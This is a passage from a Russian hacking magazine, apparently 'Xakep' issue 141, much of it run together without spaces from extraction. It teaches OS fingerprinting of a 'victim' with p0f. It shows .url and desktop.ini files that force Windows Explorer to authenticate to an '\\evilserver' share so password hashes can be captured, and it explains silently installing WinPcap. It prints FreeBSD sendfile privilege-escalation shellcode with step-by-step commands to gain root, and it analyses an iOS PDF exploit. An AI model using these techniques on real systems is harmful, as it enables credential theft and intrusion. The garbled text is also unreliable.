книги хакеры / журнал хакер / 141_Optimized

¹ 4 ЗАДАЧА: УДАЛЕННООПРЕДЕЛИТЬВЕР-

СИЮОСПОФИНГЕРПРИНТУСТЕКАTCP/ IP. ПАССИВНЫЙМЕТОД

РЕШЕНИЕ:

Вернемся к классике. Для проведения любой более-менее осмысленной атаки нам чаще всего требуется определить ОС, под которой сидит наша жертва. Сделать это можно разными путями: и из баннеров всевозможных сервисов, и по набору открытых портов, и используя СИ :). Но есть злобный метод — на основе анализа протоколов стека TCP/IP. Протокол IP и TCP(есть методы и с ICMP, и с UDP) четко расписан в RFC: взаимодействие, заголовки, поля. Четко, то есть для нормального взаимодействия различных систем хватает, да не совсем. Есть много тонкостей в реализации — какие использовать изначальные значения для полей? Как менять их по ходу соединения? Как отвечать на нестандартные запросы? И в каждой конторе, производящей ОС, на них нашли различные ответы. Что еще лучше

— разница чувствуется в поколениях ОС.

Первые крупные работы по этой теме появились еще в 1999-2000 годах (когда-то этим и мы занимались... эх, детство-детство :)), так что тема уже хорошо прожевана и много всего интересного можно быстро прогуглить (nmap.org/book/osdetect.html). Но это не отрицает ее важности и теперь.

ОС-фингерпринтинг делится, как обычно, на активный и пассивный. Пассивный занимается тем, что анализирует поля TCP/IP-прото- колов начальные значения, алгоритм их изменения, в активном к этому добавляется отправка жертве всевозможных нестандартных пакетов и просмотр реакции на них. Пассивный, получается, менее точен, но зато мы не отправляем никаких данных нашей жертве, то есть нас обнаружить невозможно. Что не очень удобно — нам надо, чтобы жертва либо сама коннектилась к нам, либо как-то прослушивать ее трафик. У пассивного метода есть еще один «бонус», эффективность его с годами особо не ухудшилась — разные производители как имели свои решения всех тонкостей стека, так и имеют, что нельзя сказать об активном, ведь теперь, например, очень часто производится нормализация пакетов на файрволах.

Одним из лучших пассивных ОС-фингерпринтеров является p0f. Скачать и почитать доки о нем можно тут — lcamtuf.coredump.cx. К тому же, он входит в BackTrack 4. Версии есть под все основные ОС. Жаль, что официальная разработка остановилась в 2006 году. Но по инету еще раскидано несколько «доделок».

Прога может использовать один из четырех методов:

по пакетам с выставленным SYN (по умолчанию) и SYN-ACK; анализ пакетов на установку соединения;

ДетектимОСчерезEttercapNG

RST— сброс соединения (когда порт закрыт, например); ACK — в передаче данных (совсем экспериментальный).

Для каждого из методов своя сигнатурная база. Кроме детекта ОС прога умеет выявлять NAT, файерволы, настройки сети. Что еще хорошо — она умеет работать с pcap-файлами. Так что можно, наснифав у жертвы трафика, поковырять его в «домашних условиях».

Вообще, обычная практика, когда p0f вешают на шлюз и таким образом получают инфу обо всей подсети. А для ускорения сбора можно добавить «активности», и, например, просканить сеть с поддельного IP’шника. Палево небольшое, если правильно все организовать.

Например, запуск p0f на прослушку интерфейса (-i) eth0 с выводом полученных сигнатур (-S) и сохранением в файл (-o):

p0f -i eth0 –S –o os.txt

Или скормим ему pcap-файл и установим детект по RST-пакетам:

p0f -R -s test_osdetect.pcap

ВЗЛОМ

ОпределяемОСпоRST-пакетамизpcap-файла

Также можно выставлять интерфейс на прослушку (promiscuous mode) параметром «-p» и устанавливать фильтр на пакеты, используя регулярные выражения tcpdump’а, а остальные опции смотри в хелпе.

Как уже говорилось ранее, p0f уже официально не развивается, и, что хуже, не обновляются базы сигнатур. Можно, конечно, заморочится и сделать свою, либо порыскать в Сети — там есть. Но есть еще одно решение. Возможности p0f’а встроены в Ettercap (ettercap. sourceforge.net). А последний, как известно, живет и развивается. Вот и базы его имеют около 1200 сигнатур, по сравнению с 200 у p0f. ЗапуститьОСдетектвEttercap можнотак(вGTK, curses-интерфейсе):

1)Sniff — Unified sniffing 2)Start — Start sniffing 3)View - Profiles

Кстати, исследования ОС детекта не остановились, и появляется что-то новое. Например, dca.ufrn.br/~joaomedeiros/gsoc/2009/proposal/node1.html — забавно-

показательнаяработа2009 годапрофингерпринтнаосновеанализа TCP ISN множествапакетов(развитиеидеи, заложеннойвp0f). Автор обещалреализоватьидеювNmap.

¹ 6 ЗАДАЧА: СКРЫТНОЗАСТАВИТЬЖЕРТ-

ВУПОДКЛЮЧИТЬСЯКОПРЕДЕЛЕННОМУХОСТУ

РЕШЕНИЕ:

ВмайскомномереяписалоSMB relay-атаках. Однимизважныхмествних быланеобходимостьвтом, чтобыжертваподсоединиласькнашемузлосерверу, накотороммыужеивыполнялибывсенеобходимыедействияс хешикамипользователей.

КромеатакпоSMB можноорганизоватьобщий«сборинформации» через тотжеp0f илислежкузаюзером. Заостримвниманиенаэтом— какзаставитьихподключиться?

ОченьудобнодлятакихвещейпользоватьсястандартнымивозможностямиWindows, хотяэтотребуетдоступкобщемуресурсувсетиилик компьютеружертвы.

Говоряпро«стандартныевозможности», яимеюввидуто, какПроводник виндыобрабатываетнекоторыевидыфайлов. КнимотносятсяInk (ярлыки), url (ярлыкиинтернета) иdesktop.ini (настройкаотображенияпапок). В нихможноуказыватьпутькнашемусерверу. Икогдапользовательбудет просматриватьпапкусэтимифайламичерезПроводник(TotalCommander вродеведетсебятакже), тоПроводникавтоматическиподключитсяк нашемусерверуипопытаетсяавторизоваться, чтонамитребуется. Итак, создаемurl-файл. Пишемвтекстовыйфайлследующееисохраняемс расширениемurl:

[InternetShortcut]

URL=http://www.example.com IconFile=\\evilserver\ipc$

ГдеIconFile—указательнафайликонки,которыйссылаетсянанашсервер;

URL — кудаперейдетпользователь, еслизапуститэтотфайл. Проводник, заходявпапкусэтимurl-файлом, подгружаетиконкуснашего сервера, пользовательженичегоплохогозаметитьнеможет— ярлык можетссылатьсяначто-тонужное.

Сlnk точнотакаяжелогика. Внемможнозадатьпутьдоиконки. Воттолько форматярлыканепозволитотредактироватьеговтекстовике. Можно стандартнымисредствамивиндысоздатьярлычокивегонастройкахпрописатьпутьдоиконки, апотомизменитьеговHEХ-редакторе.

Далее— desktop.ini. Этофайлнастройкиотображениясистемныхпапок. В немможнопрописатьссылкинанашсервервразныхместах, ноиреакция Проводникабудетразной:

ВIconFile — читается, когдапроводниквходитвпапку, гденаходитсяподпапка, вкоторойлежитнашdesktop.ini;

LocalizedResourceName — аналогично; InfoTip — когдавыбираютпапкусdesktop.ini; desktop.ini — когдаПроводниквходитвпапку. Примерсdesktop.ini ивсемиметодами:

[.ShellClassInfo] desktop.ini=@\\evilserver\ipc$,-1 InfoTip=@\\evilserver\ipc$,-1 LocalizedResourceName=@\\evilserver\ipc$,-1

Автоматическийконнекткудаленномуресурсуприпросмотрепапки

IconFile=\\evilserver\ipc$

Длятого, чтобыdesktop.ini заработал, естьоднотребование— ондолжен лежатьвсистемнойпапке. Сделатьпапкусистемнойможнокомандойв консоли:

attrib +s имя_папки

Затоуметодовсиконкамиестькосяк— еслиссылатьсяненаиконку, то пользователюбудетотображатьсястандартнаявиндоваяиконканеизвестногофайла, чтопалевно. Ноэтотожеможнопоправить.

Какобычно, длякаждойситуациисвое. Данныеспособыбылипочерпнуты сужеупомянутогосайтапарочкиресерчеров. Нанемжевыложенатулза

(tarasco.org/security/payload/index.html), котораяможетбыстренькогене-

ритьфайлыперечисленныхвидов, плюсклассические— вставкассылокв html иdoc (ppt, xls) файлы.

Смыслабольшоговнейневижу, развечтодлягенерацииlnk-файлов:

payload.exe -t l -d \\evilserver\ipc$

Где–t l — указываемтип— lnk-файл; -d — путькнашемусерверу.

Большинствосамыхприятныххакерскихштуковин,ксожалению,простотак вВинденеработают.Им,какминимум,WinPcapнужен.Поидее,начинаяс XP,доступкraw-сокетаместь,нотолионнетакхорош,либоиз-заудобства (совместимостьсlibpcap’ом)пользуютсяименноWinPcap.Привзломахэто напрягает.ВотвтомжеMetasploit’еестьмодульдляудаленногоснифингатрафика,тоестьнамашинежертвы,ноподWinнеработает(ксожалению).Ктому же,впрошломномереяписалпроmeterpreterчерезicmp-туннель,который такжетребовалWinPcapдлясвоейработы.Послепоставленнойзадачибыли проведенынебольшиеизыскания,ипроблемарешилась.Оказалось,чтовсе достаточнопросто,хотяразличныеразработчикиПО«тихийустановщик»и предлагаютзаденежку.Требуетсявсеголишьскопироватьфайлы:

Первыетриможнонекопироватьвсистемнуюдиректорию, акинутьв тужепапку, чтоипрогу, которойнуженWinPcap. Приэтом, во-первых, каждомуПОпотребуютсясвоибиблиотеки, аво-вторых, намвсеравно нужнокопироватьnpf.sys впапкусдровами, тоестьиправанужны соответствующие.

Что самое приятное — библиотеки WinPCap не палятся антивирусами (как бы и повода нету), потому обнаружить их достаточно трудно, и все вместе почти ничего не весят (500 Кб). При использовании библиотек также требуются админские права, но если прописать драйвер npf.sys на загрузку при старте системы, то это ограничение снимается. z

ВЗЛОМ

Алексей Синцов, Digital Security a.sintsov@dsec.ru

01ВЫПОЛНЕНИЕПРОИЗВОЛЬНОГОКОДА ПРИОТКРЫТИИPDF-ФАЙЛАВIOS

TARGETS

Apple iPhone 3/3G/3GS

Apple iPod

Apple iPad

Apple iOS 3.X/4.0.X

CVE

CVE-2010-1797

BRIEF

Переднашимиглазамиотличныйпримертого, какуязвимостьиэксплойтработаютна«благо» пользователей. Деловтом, чтовсемызнаем протакойпопулярныйимодныйпродукт, как, например, iPhone. Также мызнаем, чтонашидействиявэтомпотенциальноотличномдевайсе сильноурезаны. НиподнятьтебеSSH-сервер, нискомпилитьвторой квейк... Понятно, чтотелефондолжензвонить, анекомпилировать, ноне затакиеденьги. ПосемухакерырегулярновыкладываюттакназываемыеJailbreak’и. Дословнопереводитсякак«побегизтюрьмыстрого режимаим. СтиваДжобса». Такие«патчи» нелицензионныиаморальны (нозаконны), таккакоставляютбезденегпроизводителейПОдлямагазинаAppStore, чтоторгуетсофтомдляяблочныхдевайсов. Такпричем тутобзорэксплойтов? Дапритом, чтопоследнийJailbreak, которыйбыл реализовантвиттер-юзером@comex иегокомандой(iPhone Dev Team), использовалуязвимости0day вПОApple. РезультатработыбылпродемонстрированнаDefcon 18. Таквот, внедрениекодабылоосуществлено черездве0day уязвимости: однавPDF-читалке, встроеннойвтелефон, авторая— вядреiOS. Такимвотобразомможновеселорасширять функционалiPhone — спомощьюхорошихэксплойтов. Деталиэксплойтанеособораспространяются, оноипонятно, ведьэтабрешьещене исправлена, а, значит, попадиэтооружиевруки«злых» дядей, товполне возможна попыткапостроенияботнетанаосновеApple-устройств.

EXPLOIT

Кое-что, всеже, обтомэксплойтеизвестно. Перво-напервовзглянемна содержимоеPDF-файла:

13 0 obj <</Subtype/Type1C

/Filter[/FlateDecode] /Length 10709>> stream

xϒ}

t ×μî‘-ƒldc0!

.... вырезано много байт....

endstream endobj

15 0 obj

<< /Type /FontDescriptor /Ascent 750 /CapHeight 676 / Descent -250 /Flags 32

/FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+TimesRoman /ItalicAngle

0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 13 0 R

>>

endobj

Собственно, тутизарытаперваяуязвимость— ошибкаприобработке Type1C-шрифтов, где, судяповсему, происходитзахватстекачерезпереполнениебуфера. Каквидно, 15 объектссылаетсянаописаниешрифтов, наобъект13 (/FontFile3 13 0 R), гдеунасописанType1C-шрифт. Вформате описания(CFF - Compact Font Format) искрытаошибка. Ачтоунастам, гдевырезаномногобайт? Судяпотэгу/Filter[/FlateDecode], тамунас «закодированая» область, котораялегкодекодируетсяспомощьюPDFTK (скачатьсгуи-интерфейсомможнотут: paehl.de/pdf/gui_pdftk.html). Врезультатевместокашимыполучилипочтичитаемыйкод, вернеесначала мывидимCFF-описание, гдеестьтриггеруязвимости(точнонеизвестно, где— надокуритьманпоCFF), идалее, судяповсему, ROP-программа. Отмотаемскроллерпониже— открытымтекстомбиблиотека, которая используетсядляполученияправroot'ачерезвторуюуязвимость(при выделениипамятивIOSurface). Витогебоеваянагрузказаключаетсяв том, чтобызакачатьJailbreak-софт, получитьрута(итемсамымвыбраться изпесочницы— защитногомеханизмаiOS) иустановитьего. Вотивсе.

SOLUTION

ПокаэтотэксплойтиспользуетсятолькодляJailbreak'а, но, темнеменее, неисключенымодификации. Покатакихслучаевневыявлено. Кроме того, патчаещенет, видимо, будетвследующейверсиипрошивки. Для тех, ктовсежеиспользовалJailbreak, естьвозможностьустановить предупреждалку, котораяприоткрытииPDF-файлапредупреждаетоб угрозе.

iPhone — Jailbreak вдействии

02ПОВЫШЕНИЕПРИВИЛЕГИЙВ

FREEBSD

TARGETS

FreeBSD 7.x

FreeBSD 8.x

CVE

CVE-2010-2693

BRIEF

ИнтереснаяуязвимостьвОСFreeBSD былаобнаруженаисследователемMing Fu. Даннаяуязвимостьпозволяетлегкополучитьправаroot’а всистеме. ВпоследствиитоварищKingcope опубликовалэксплойт, реализующийэтууязвимость. Преждечемначатьописаниеэксплойта, рассмотримнекоторыеобъектыОС.

ВОС(FreeBSD) дляорганизациимежпроцессноговзаимодействияидля работыссетевойподсистемойиспользуетсяспециальныйобъектпамяти— mbuf. Вэтойпамятимогутхраниться, например, пакеты, которые передаютсяпосети.

Системныйвызовsendfile() используетсядляпередачисодержимого файла(пооткрытомудескриптору) всокет. Тоесть, еслисовсемгрубо— отправкасодержимогофайлапосети. Приэтом, какпонятно, дляданных файлаиспользуетсяmbuf.

Собственноуязвимостькроетсявреализацииmbuf, авэксплуатации помогаетименноsendfile(). Давайтевзглянемподробнее...

iPhone. УязвимостьвPDF

EXPLOIT

Вчемжеошибка? Привызовеsendfile() mbuf-блокипредставляют собойуказателинасодержимоефайлавкэшефайловойсистемы. Приэтомуказателиэтидоступнысугубодлячтения, чтологично. Но программистыизБэрклисовершилиоднумаленькуюошибочку, совсем крохотную— придублированииссылкинаmbuf-блокправакопируются некорректно, вернее, ограничение«толькодлячтения» некопируетсяв

новомуказателе(вфлагах). Такоедублированиепроисходитприиспользованииsendfile(), аименно— дескрипторсокетабудетвлиятьнаmbuf. Этофактическиозначает, чтоможномодифицироватьфалы, которыедля записинедоступны(опятьже— вкэшефайловойсистемы). Например, можноизменить/bin/sh, добавиввнегокод, которыйдаетправаroot. Рассмотримтеперьэксплойт(заточенонподx64 иподx32, рассмотрим толькоx32):

main (int argc, char *argv[])

{

int s, f, k2;

struct sockaddr_in addr; int flags;

//Шеллкод — ставит /tmp/sh владелца root и sticky bit

//что означает, что данный процесс будет

//иметь правами владельца файла, если его запустят…

char str32[]=

"\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3"

"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"

"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"

"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";

char buf[10000];

ВЗЛОМ

ColdFusion — получаемхеш

//nop’û

for (k2=0;k2<256;k2++)

{

buf[k2] = 0x90;

}

p = buf;

p = p + k2;

//После nop’ов добавляем шеллкод memcpy(p, str32, sizeof str32);

n = k2 + sizeof str32; p = buf;

}

//Пишем шеллкод прямо в сокет //после многократного sendfile //Есть вероятность перезаписи mbuf //указывающих на кэш с файлом, //который мы отправляли - /bin/sh write(s, p, n);

}

}

Такимобразом, дляначаланадосделатькопии/bin/sh вtmp:

cp /bin/sh /tmp/sh cp /bin/sh /tmp/sh2

Затемнавторомтерминале(ALT+F2) открытьnetcat, чтобыслушатьпорт,

кудафайлслатьбудем...

nc -l 7030

Послеэтогоскомпилируемизапустимэксплойт:

gcc cache.c -o cache

./cache i386

Теперьждемоколопятиминут. Заэтовремя, возможно, получится повредитькэш-памятьссодержимым/bin/sh, которыйизменитправаи владельцев/tmp/sh изапустит/tmp/sh2. Послеэтогосмелозапускаем/ tmp/sh, имы— root.

ColdFusion — входимвадминку

SOLUTION

Имеется патч, который, по сути, добавляет забытый флаг — M_RDONLY.

======================================================

/*

04ОБХОДКОРНЕВОЙДИРЕКТОРИИ ВCOLDFUSION

TARGETS X

ColdFusion 9

ColdFusion 8

ColdFusion 7

CVE

CVE-2010-2861

BRIEF

ColdFusion — достаточноизвестныйипопулярныйязыкпрограммированиядляWeb. Крометого, этоещеиудобнаяплатформадляразвертываниясвоейсистемы, садминкойивсемтакимпрочим. Но, как известно, ПОбезошибокнебывает. ТакисплатформойColdFusion, вскриптахкоторойобнаруженавозможностьобходадиректорийи доступакпроизвольнымфайлам. УязвимостьбылаобнаруженаРичардомБрайном(Richard Brain), которыйсообщилобэтомAdobe. Тем неменее, эксплойтпросочилсявпабликотнекогоанонимноголица, с чемнасипоздравляю.

EXPLOIT

Длянекоторыхскриптовплатформыможноуказатьлокаль— языкшаблона, чтонесомненно, удобно, напримертак: